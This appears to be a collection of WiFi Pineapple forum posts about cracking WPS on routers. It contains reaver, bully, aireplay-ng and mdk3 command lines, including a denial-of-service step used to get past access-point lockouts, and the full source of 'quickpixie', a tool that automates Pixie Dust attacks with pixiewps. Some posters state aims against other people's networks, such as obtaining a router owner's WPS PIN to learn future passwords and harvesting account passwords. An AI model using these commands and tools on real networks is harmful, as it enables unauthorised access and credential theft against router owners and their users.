Search the Community

Hi guys, I have a problem: I want to hack my Wifi but all the attacks which I found only worked for WPS 1.0 but not on my WPS 2.0. Of course I am open minded for other ways to hack my wifi but none of the attacks which I found worked.🙄😞

Hi guys, I have questions. I have pin and ssid of a hiden network but i don't know the way to find key? Thank's

More and more routers are becoming resistant to the Reaver magic. That's a good thing, because we all want easy and secure working hardware in our (grand-)parents' homes. But are they really secure? Today I had an encounter with a stubborn fellow that tried to stop me from brutally forcing myself into his backdoor. Good job boy, you kept me out, you're safe! Yeah right... So I fired up another command: mdk3 mon0 a -a [MAC] -m Let that rip for a minute, tried reaver again, bingo! It accepted my brute force methods again. But after a few minutes it locked up again. Time for some more of that mdk3 vaseline, let it rip again, and after reavering it accepted my crowbar. Now my question is, can someone explain to me or show me how to write some kind of script that does this automatically? So it should do this on it's own: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m Run that for a minute or something and then again from the top: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m And so on and so on and so on...

Helle all, I would like to install the latest version of reaver (1.6.1) this version can send an empty pin "NULL_PIN". I have a first error message to compile and I do not know how to install gcc, can you help me ? Git: https://github.com/t6x/reaver-wps-fork-t6x 0day with reaver 1.6.1: http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure -ash: ./configure: Permission denied root@Pineapple:~/reaver-wps-fork-t6x-master/src# chmod +x configure root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure checking for gcc... no checking for cc... no checking for cl.exe... no configure: error: in `/root/reaver-wps-fork-t6x-master/src': configure: error: no acceptable C compiler found in $PATH See `config.log' for more details root@Pineapple:~/reaver-wps-fork-t6x-master/src# Thank you Br, Netask

So, I use ParrotOS. A week ago it updated from 3.6 to 3.7 moving the kernel from I believe was 4.4 to 4.11. Okay, after that happen, all wps attack I can do no longer work. Wash works but reaver and bully does not, at all. Issue is posted on t6x repository for reaver. A few of the contributors have responded to a few people having the same issue going to the new version of Kali. Issue is either association issues in reaver followed by repeated send and receives and either a deauth, timeout or looping EAPOL messages. All my stuff running ParrotOS was already on 3.7 and had the same issue except for 1 device I still have on 3.6 and Kernel version 4.4.9. Reaver works fine on it with my alfa with the -T 3 option. ( T 3 option was recommended by one of the contributors). So, I am talking with the Parrot folks to see if there is a repo I can use (since I still have the 3.6 iso) that can update a 3.6 installation to the newest updates before 3.7 for testing just to see if it really broke right before or after the kernel update. The reaver folks want to see how it responds to the other kernel versions like 4.8, 4.9 to see exactly where it goes south. Of course he doesn't know how to do kernel compilations and I have not done that either. What I am wondering is if others have experienced the same on their distros of linux running Kernel 4.11..if they got it?

I hate to sound like an incompetent newbie, however the videos out there seem to be very dated and I am looking for some help. I have tried to get the Module WPS to work. I believe I got the basics running and my Tetra start flashing like crazy on the 3rd light which I believe means it is trying to brute force into the access point. Where are the logs? How can I tell if it is active and what progress we have made. If close or your window times out and you reconnect to the modules page it wants you to start the config again. I am not newbie to wireless, however I am a newbie to trying to crack it and break it. Any help would be greatly appreciated and if anyone knows an individual looking to do some consulting on both this and the turtle please PM me.

Look at the video. Video Here I am unable to carry out wps attack and unable to deauthenticate the connected as well.

Change log: [v1.1] *Added .pixie files that are saved with the latest reaver's -H option as an acceptable input file with -i (ex. -i /path/to/bssid.pixie) They are treated differently than text files containing pixie data to be parsed, as they are simply set to be executable and then executed since the command is already built at the end of files in the .pixie format and in executable form. *Added -pd / --pixie-dir option which allows you to scan through a directory and all subdirectories within it for .pixie files to execute and/or text files containing pixie data to parse. This expands on the usefulness of the application by making it easier to get pixie data into it! *Added -pe / --pixie-exts option that lets you filter the files which the -pd option will even look at by extension. So for example if you have only .pixie files and .txt files containing pixie data you can prevent it from opening up just any file *.* (which is the default with --pixie-dir option) *Fix: Small Diffie Hellman doesn't have to be specified and shouldn't unless you know all your files containing pixie data all use small diffie hellman, it is determined that if pkr isn't set up to the point where it's about to execute, it assumes small diffie hellman. *Reorganized and cleaned up the code a bit Thanks to ephemient from stackoverflow for the clean and concise directory searching code. root@kali:~/codeblocks/quickpixie# ./quickpixie -h quickpixie 1.1 ~ AlfAlfa quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver. It then uses those arguments to build the command to execute as well as executing it automatically... Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files -i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard. -pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs. -pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension -S is for small diffie hellman (PKR not needed) -b or --e-bssid is for passing a bssid to pixiewps if needed -f or --force is for --force -j or --just-display only prints the command(s) without executing -v is for most verbose output (-v 3) usage: quickpixie -f (pass --force to pixiewps) quickpixie -j (just display the generated command(s) but don't execute) quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file) quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option) quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data) quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data) pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie) In action with main mode (uses clipboard): http://webmshare.com/nrGXa Usually we use reaver with the -K 1 switch so reaver automatically does the pixie attack for us. However sometimes you might be running pixiewps manually and if you have done so, you know it's kind of a pain to build up the command copying and pasting the pke, pkr, ehash1, ehash2, and authkey one by one... So I created quickpixie to get around that! If you copy the whole block all the way from at least the PKE field to the E-Hash2 field you'll have the minimum required to run pixiewps. Then just run pixiewps and it builds and runs the command for you! :) I recommend also including the enonce as well even though it's optional as it can help and now it's no more trouble to do so(just start copying from enonce instead of pke). If there are multiple concatenations of usable pixiewps data, it also handles as many as you can throw at it. When using an input file "-i" instead, it ignores the clipboard and uses pixie data from that file to generate and execute pixiewps commands. You can also specify to use stdin instead of a regular file so you can pipe the output of another application and use it as input to generate pixiewps command lines from :D similar to: (piping words from crunch to aircrack) crunch 8 8 0123456789 | aircrack-ng MY-AP*.cap -w - You can: (round about way of doing "quickpixie -i multi-pixie.txt" cat multi-pixie.txt | quickpixie -i - and: (round about way of doing almost the same as just "quickpixie" with no arguments) xclip -selection clipboard -o | quickpixie -i - The best thing you could do with that is if you had a cool application that outputs data needed for pixie attacks maybe from your pixie attack cluster and you feed that into quickpixie for batch processing automated pixie attacking ;) Prerequisites: (* == comes with kali) pixiewps * xclip* (for standard mode which reads from the clipboard) g++ * (to compile it) Install: 1. download and move "quickpixie.cpp" to somewhere 2. cd to that location 3. g++ -std=c++0x -o quickpixie quickpixie.cpp (optional 4: cp quickpixie /usr/bin/quickpixie {recommended so you can execute it from anywhere}) Now from that directory execute it: ./quickpixie (or just quickpixie if you copied it to /usr/bin) Output of quickpixie with no arguments when example below was on the clipboard! Was on clipboard: PKE: 20:2a:5f:30:66:da:4d:25:9a:f3:72:09:b4:94:25:6a:5b:bc:87:49:27:64:ee:2f:c9:ad:b7:d6:33:7c:5c:b3:61:9d:7d:57:2a:9c:43:16:70:aa:0f:5e:71:20:da:f1:07:db:7e:71:db:3c:1e:32:2a:44:f9:f5:56:5d:ed:70:03:3c:e5:2d:59:34:ab:8b:36:1d:cc:cb:4c:87:bd:12:61:43:a3:05:c9:b4:79:8c:42:9e:12:6a:04:33:58:68:28:21:fd:2d:b0:b0:d0:cf:ab:23:f6:be:65:f7:6f:69:32:f3:4a:24:10:c9:72:48:9e:38:fa:1d:36:3b:65:95:73:93:c4:af:8f:86:04:77:3c:d8:ba:3a:c7:00:fc:a8:a1:c3:c7:74:aa:8b:ff:1d:f6:fd:6b:e1:a0:3d:0d:bf:82:49:3b:e1:a7:7b:f8:b3:95:9c:b0:bf:5d:99:e5:7e:80:6c:ee:4c:cb:46:f9:49:69:3e:35:c8:03:05:cf:6a [P] WPS Manufacturer: Ralink Technology, Corp. [P] WPS Model Name: Ralink Wireless Access Point [P] WPS Model Number: RTXXXX [P] Access Point Serial Number: XXXXXXXX [+] Received M1 message [P] R-Nonce: 00:bd:d0:7c:6e:74:47:4d:b4:e9:ba:56:20:03:62:d1 [P] PKR: 11:97:bc:f9:42:c0:ce:4b:07:09:1e:12:50:0b:bb:e1:8e:7d:0f:ef:98:a8:f9:95:a8:de:e3:7d:a9:e8:2d:2a:07:06:b7:2b:f3:17:2a:b9:f6:70:24:f4:89:9f:be:51:b7:df:90:d8:23:40:bd:36:8d:ef:1c:cd:ac:6a:1a:98:b4:fa:1c:d6:b0:39:e1:09:dd:18:e5:ea:6d:b3:d9:0c:92:f3:10:39:4f:60:36:ea:07:1d:4e:a0:74:2c:6d:d6:6b:6f:f5:41:2c:bb:a1:9f:95:00:cd:1b:b0:61:00:7b:47:03:37:15:6d:fb:43:a8:5d:60:6e:65:b2:10:e5:d8:d8:14:58:48:c4:4e:74:15:5d:ab:68:37:68:04:dc:fc:5b:3a:bd:dc:00:8a:59:ae:53:c0:98:75:06:0f:ed:80:5e:7d:b3:39:dd:12:ea:36:c2:52:47:46:c5:8b:59:ee:f2:90:e4:77:45:c7:dd:19:fa:3e:cd:90:50:f0:55:57 [P] AuthKey: 4b:d8:3f:55:aa:15:0a:33:e6:3a:03:b7:c8:c0:6e:51:dc:e6:50:98:33:d6:4c:63:5f:c8:5f:bf:ca:1c:a2:de [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: 6b:2c:c1:b4:78:da:a4:e9:78:8c:96:8d:b0:85:68:51:ad:4c:43:84:9f:77:38:20:7a:5c:51:7d:94:d8:a9:69 [P] E-Hash2: 2e:db:1d:8f:f8:a6:34:5f:70:2c:33:c2:7e:28:17:45:65:5c:85:6c:17:d4:c5:fc:f7:9d:e8:98:89:b1:4c:33 quickpixie.cpp /* 12.24.2015 ~ AlfAlfa | quickpixie 1.1 Updated: 02.06.2016 */ #include <sys/stat.h> #include <ftw.h> #include <fnmatch.h> #include <string.h> #include <iostream> #include <memory> #include <vector> std::string enonce, rnonce, pke, pkr, authkey, ehash1, ehash2, optional_arguments, input_file, pixieDir; std::vector<std::string> pixieExts; bool just_display = false, small_diffie_hellman = false, most_verbose = false, piped_input = false, using_clipboard = true, using_pixie_dir = false; size_t pixiecount = 0; class ProcessExecutor { private: static std::unique_ptr<ProcessExecutor> mainInstance; public: FILE *file; std::string output; char buffer[4096]; ProcessExecutor() { memset(buffer, 0, sizeof(buffer)); } static std::unique_ptr<ProcessExecutor> make() { return std::unique_ptr<ProcessExecutor>(new ProcessExecutor()); } static ProcessExecutor *get() { if(!mainInstance.get()) mainInstance = make(); return mainInstance.get(); } int run(const char *cmd, bool printout = false) { file = popen(cmd,"r"); if(!file) return 1; output.clear(); while(fgets(buffer, sizeof(buffer), file) != 0) { output += buffer; if(printout) std::cout << buffer; } if(printout) std::cout << "\n"; pclose(file); return 0; } }; std::unique_ptr<ProcessExecutor> ProcessExecutor::mainInstance; class KeyValueGrabber { private: std::string *keysandvalues; public: size_t currentPosition, wouldBeNextPos, lastKeyPos; KeyValueGrabber() { currentPosition = 0; } std::string valueForKey(const char *key) { if(key != 0 && keysandvalues->length() > 0) { size_t valueStartPos = lastKeyPos = keysandvalues->find(key, currentPosition); if(valueStartPos != std::string::npos) { valueStartPos += strlen(key); size_t valueEndPos = keysandvalues->find("\n",valueStartPos); if(valueEndPos == std::string::npos) valueEndPos = keysandvalues->length(); wouldBeNextPos = valueEndPos + 1; return keysandvalues->substr(valueStartPos, (valueEndPos - valueStartPos)); } } return std::string(""); } size_t movePosition(size_t newPos = 0) { if(newPos == 0) currentPosition = wouldBeNextPos; else currentPosition = newPos; return lastKeyPos; } void resetPosition() { currentPosition = 0; } void set(std::string *p) { keysandvalues = p; } }; class QuickPixie { public: static void buildAndExecute() { std::string pixiecommand = "pixiewps -e " + pke; if(!pkr.empty()) pixiecommand += " -r " + pkr; pixiecommand += " -s " + ehash1 + " -z " + ehash2 + " -a " + authkey; if(!enonce.empty()) pixiecommand += " -n " + enonce; if(!rnonce.empty()) pixiecommand += " -m " + rnonce; if(!optional_arguments.empty()) pixiecommand += optional_arguments; //If small diffie hellman isn't set for every command, but pkr is still empty at this point, just assume small diffie hellman... if(!small_diffie_hellman && pkr.empty()) pixiecommand += " -S"; std::cout << "{" << ++pixiecount << "}\n" << pixiecommand << "\n\n"; if(!just_display) { auto pixiewps = ProcessExecutor::make(); pixiewps->run(pixiecommand.c_str(), true); } } static void executePixieFile(std::string pixieFilePath) { if(most_verbose) std::cout << "Executing pixie file: " << pixieFilePath << "\n"; chmod(pixieFilePath.c_str(), S_IRWXU); //set executable for owner //then execute it! if(pixieFilePath.find('/') == std::string::npos) ProcessExecutor::make()->run(("./" + pixieFilePath).c_str(), true); else ProcessExecutor::make()->run(pixieFilePath.c_str(), true); } static int parseTextFile(std::string pixieTextFilePath) { FILE *pixieTextFile = fopen(pixieTextFilePath.c_str(), "r"); if(!pixieTextFile) { std::cout << "ERROR: Could not open input file \"" << pixieTextFilePath << "\"\n"; return 1; } if(most_verbose) std::cout << "Parsing file for pixie data: " << pixieTextFilePath << "\n"; return parseTextFile(pixieTextFile); } static int parseTextFile(FILE *pixieTextFile) { if(!pixieTextFile) { std::cout << "ERROR: No file passed in to parseTextFile member function"; return 1; } std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); std::string currentLine; kv->set(&currentLine); while(fgets(exec->buffer, sizeof(exec->buffer), pixieTextFile) != 0) { currentLine = exec->buffer; std::string enonce = kv->valueForKey("E-Nonce: "); std::string pke = kv->valueForKey("PKE: "); std::string rnonce = kv->valueForKey("R-Nonce: "); std::string pkr = kv->valueForKey("PKR: "); std::string authkey = kv->valueForKey("AuthKey: "); std::string ehash1 = kv->valueForKey("E-Hash1: "); std::string ehash2 = kv->valueForKey("E-Hash2: "); if(!enonce.empty()) ::enonce = enonce; else if(!pke.empty()) ::pke = pke; else if(!rnonce.empty()) ::rnonce = rnonce; else if(!pkr.empty()) ::pkr = pkr; else if(!authkey.empty()) ::authkey = authkey; else if(!ehash1.empty()) ::ehash1 = ehash1; else if(!ehash2.empty()) ::ehash2 = ehash2; if(!(::pke.empty() || ::authkey.empty() || ::ehash1.empty() || ::ehash2.empty())) { buildAndExecute(); clear(); } } fclose(pixieTextFile); return 0; } static void parseClipboard() { if(most_verbose) std::cout << "Parsing pixie data from clipboard\n"; std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); exec->run("xclip -selection clipboard -o"); if(most_verbose) std::cout << exec->output << "\n\n"; kv->set(&exec->output); size_t pos = 0; while(pos != std::string::npos) { //optional arguments enonce = kv->valueForKey("E-Nonce: "); rnonce = kv->valueForKey("R-Nonce: "); //required arguments pke = kv->valueForKey("PKE: "); pkr = kv->valueForKey("PKR: "); authkey = kv->valueForKey("AuthKey: "); ehash1 = kv->valueForKey("E-Hash1: "); ehash2 = kv->valueForKey("E-Hash2: "); pos = kv->movePosition(); if(pos == std::string::npos) break; if(pke.empty() || authkey.empty() || ehash1.empty() || ehash2.empty()) { std::cout << "ERROR: Your copied to clipboard input for pixiewps is missing a required argument...\n"; std::cout << "PKE, PKR, E-Hash1, E-Hash2, and AuthKey are all required arguments.(except PKR when -S is used)\n"; std::cout << "You have:\n" << "PKE: " << pke << "\n" << "PKR: " << pkr << "\n" << "E-Hash1: " << ehash1 << "\n" << "E-Hash2: " << ehash2 << "\n" << "AuthKey: " << authkey << "\n"; continue; } buildAndExecute(); clear(); } } static std::string extensionOf(std::string filePath) { if(!filePath.empty()) { size_t ePos = filePath.rfind('.'); if(ePos != std::string::npos) { ePos++; return filePath.substr(ePos, filePath.length() - ePos); } } return std::string(""); } static void clear() { pke.clear(); pkr.clear(); authkey.clear(); ehash1.clear(); ehash2.clear(); enonce.clear(); rnonce.clear(); } }; //Thanks to ephemient from stackoverflow for this static int directorySearchCallback(const char *fpath, const struct stat *sb, int typeflag) { /* if it's a file */ if(typeflag == FTW_F) { /* for each filter, */ for(size_t i = 0; i < pixieExts.size(); i++) { /* if the filename matches the filter, */ if(fnmatch(pixieExts[i].c_str(), fpath, FNM_CASEFOLD) == 0) { if(QuickPixie::extensionOf(fpath) == "pixie") QuickPixie::executePixieFile(fpath); else QuickPixie::parseTextFile(fpath); break; } } } /* tell ftw to continue */ return 0; } int main(int argcount, char *args[]) { std::cout << "quickpixie 1.1 ~ AlfAlfa\n\n"; for(int i = 0; i < argcount; i++) { if(strcmp(args[i], "-j") == 0 || strcmp(args[i], "--just-display") == 0) just_display = true; else if(strcmp(args[i], "-f") == 0 || strcmp(args[i], "--force") == 0) optional_arguments += " --force"; else if(strcmp(args[i], "-S") == 0) { optional_arguments += " -S"; small_diffie_hellman = true; } else if(strcmp(args[i], "-v") == 0) { optional_arguments += " -v 3"; most_verbose = true; } else if(strcmp(args[i], "-b") == 0 || strcmp(args[i], "--e-bssid") == 0) { if(i == (argcount - 1)) break; optional_arguments += " -b "; optional_arguments += args[i+1]; } else if(strcmp(args[i], "-i") == 0 || strcmp(args[i], "--input") == 0) { if(i == (argcount - 1)) break; input_file = args[i+1]; if(input_file == "-") piped_input = true; using_clipboard = false; } else if(strcmp(args[i], "-pd") == 0 || strcmp(args[i], "--pixie-dir") == 0) { if(i == (argcount - 1)) break; pixieDir = args[i+1]; using_pixie_dir = true; } else if(strcmp(args[i], "-pe") == 0 || strcmp(args[i], "--pixie-exts") == 0) { if(i == (argcount - 1)) break; int z = i; while(*args[++z] != '-') { pixieExts.push_back(std::string("*.") + args[z]); if(z == (argcount - 1)) break; } } else if(strcmp(args[i], "-h") == 0 || strcmp(args[i], "--help") == 0) { std::cout << "quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver.\n"; std::cout << "It then uses those arguments to build the command to execute as well as executing it automatically...\n"; std::cout << "Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files\n"; std::cout << "-i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard.\n"; std::cout << "-pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs.\n"; std::cout << "-pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension\n"; std::cout << "-S is for small diffie hellman (PKR not needed)\n"; std::cout << "-b or --e-bssid is for passing a bssid to pixiewps if needed\n"; std::cout << "-f or --force is for --force\n"; std::cout << "-j or --just-display only prints the command(s) without executing\n"; std::cout << "-v is for most verbose output (-v 3)\n"; std::cout << "usage:\nquickpixie -f (pass --force to pixiewps)\n"; std::cout << "quickpixie -j (just display the generated command(s) but don't execute)\n"; std::cout << "quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file)\n"; std::cout << "quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option)\n"; std::cout << "quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data)\n"; std::cout << "quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data)\n"; std::cout << "pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie)\n"; return 2; } } if(using_pixie_dir) { if(pixieExts.empty()) pixieExts.push_back("*.*"); if(most_verbose) { std::cout << "Filtering by extensions: {"; for(size_t i = 0; i < pixieExts.size(); i++) { std::cout << " " << pixieExts[i]; if(i != (pixieExts.size() - 1)) std::cout << ","; } std::cout << " }\n"; } ftw(pixieDir.c_str(), directorySearchCallback, 16); } else if(using_clipboard) QuickPixie::parseClipboard(); else { FILE *file = stdin; if(!piped_input) { file = fopen(input_file.c_str(),"r"); if(!file) { std::cout << "ERROR: Could not open input file \"" << input_file << "\"\n"; return 1; } fclose(file); if(QuickPixie::extensionOf(input_file) == "pixie") { QuickPixie::executePixieFile(input_file); return 0; } } QuickPixie::parseTextFile(file); } return 0; } Hope this is useful to you, happy holidays! :)

SSL stripping no longer works. I've been researching but gotten little results as to tutorials for other types of infusions. I want to get an infusion that can either get me wifi passwords or passwords to someone's accounts as they log into them. If possible, I would like some er infusions to start with downloading. I tried the wps infusion and it didn't work well with my router (which is why I want to use RubyReaver or Auto-Reaver). So, what other infusions could be used to monitor my other computer's web activities and the passwords that I get when I log in with my other computer (that I'm using as a target)? If possible, it would be nice if it was something I could use information I get from the PineAP log and input into such an infusion to get my passwords. I learned from this video about how to use the pineAP: https://www.youtube.com/watch?v=IdhuX4BEK6s&index=2&list=PLuXfzxj2yX_uCE8dPbP39rQIB0a8PkFHT So yeah, I don't want to buy too many new devices. I want to rely on my pineapple, but if possible I might want the documentation or something similar to learn to use such infusions. I might plug a wireless modem into my pineapple someday and go wardriving, but I want to learn to hack my own wifi first to learn before I go wardriving.

Name WPS Features - Reaver options selection - Bully options selection - History - Select AP to attack from UI Screenshots

Hello, I have the password for a wifi. Now usually i could go into the router and search in it for the WPS pin. But this router is a cheap Nexxt model and i cant find the pin, but i know they're always at the back of the router which i cant get to. I need the WPS pin in case the person tries to change his password. Then it be easy for me to get the new pasword by using the WPS Pin. My question is can i retrieve the wps pin using the wifi password. Thannks so much,

I've been trying to get the Wifi Pineapple to be able to perform the pixie dust attack for quite a while, and I can't seem to be able to. I'm thinking the problem is with the modified Reaver you have to install, but I can't be sure. I've followed this guide: http://matthewhknight.com/autopixiewps/ (In case the link above is remove or something, just google AutoPixieWPS) On my PC and Laptop it works flawlessly, but whenever I try this on the pineapple, I'm no longer able to pick up WPS. If anyone has gotten this to work, or has any ideas, please let me know. Thanks.

Hey guys! I just read an interesting article on cracking WPS by doing offline computations and figured I should share with you guys. Although I understand a good portion of this from playing with the Wifi Pineapple, this is still above my skill level to be able to implement myself. I would imagine the Mark V would be able to do this with an infusion, replacing the need for Reaver/Bully for a lot of routers with WPS. The link to the article is: http://www.engadget.com/2014/08/31/wifi-protected-setup-flaw/ Check out the SlideShare presentation for the information. I think this would be a great addition to the Pineapple's capabilities if it could be done.

So I'm not sure where to ask this, the mods at the Kali forums called this "general IT help" and deleted my question ha. Anyway, I've been playing around with Reaver again with my new router, and like the title says, can't seem to get any faster than 42-ish seconds per pin. The commands I used to even get it that 'fast' are as follows: Change my interface to same channel as router: iwconfig mon0 channel 1 Manually associate to my router: aireplay-ng -1 0 -a <router bssid> -h <my mac address, of mon0> -e <router essid> mon0 --ignore-negative-one My use of reaver: reaver -i mon0 -b <router bssid> -T 1 -f -N -S -vv All these commands are combinations of different suggestions I've seen places online, and this is what I've done to get it faster than the 50-60 sec/pin that I was getting :/ I've also tried using -r to make it pause for 60sec after 10 pin attempts, but then I would go up to 55 sec/pin again. I've had roughly -50 power the whole time during this test. Here's a chunk of my code running it overnight: [+] Received M1 message [+] Sending M2 message [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] 14.19% complete @ 2014-08-09 08:21:06 (43 seconds/pin) [+] Max time remaining at this rate: 112:44:37 (9439 pins left to try) [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response Any suggestions that might speed this up? Thanks!!

{ It's very difficult to express myself in English, I hope you will be able to understand me } (and if someone speaks French or German, it would be great ! ) I would like to create a WPA2 encrypted rogue AP with WPS (PBC) so that everyone who's trying to connect to it, does not need to type the right WPA passphrase on his computer. I already did it on my Kali Linux machine and it worked fine but I don't know how to activate the WPS (PBC) on an AP on my Wifi Pineapple MKV . Can someone help me ? Best regards, Fred.

Hi guys, anyone noticed that Reaver has been updated to 1.5? I think it's still in beta. It's changed a bit I think What do you guys think? how to install: make sure you have the libpcap and libsqlite3-dev libraries if you are on Kali. svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-onlycd reaver-wps-fork-read-only/src./configuremake distclean && ./configuresudo makesudo make install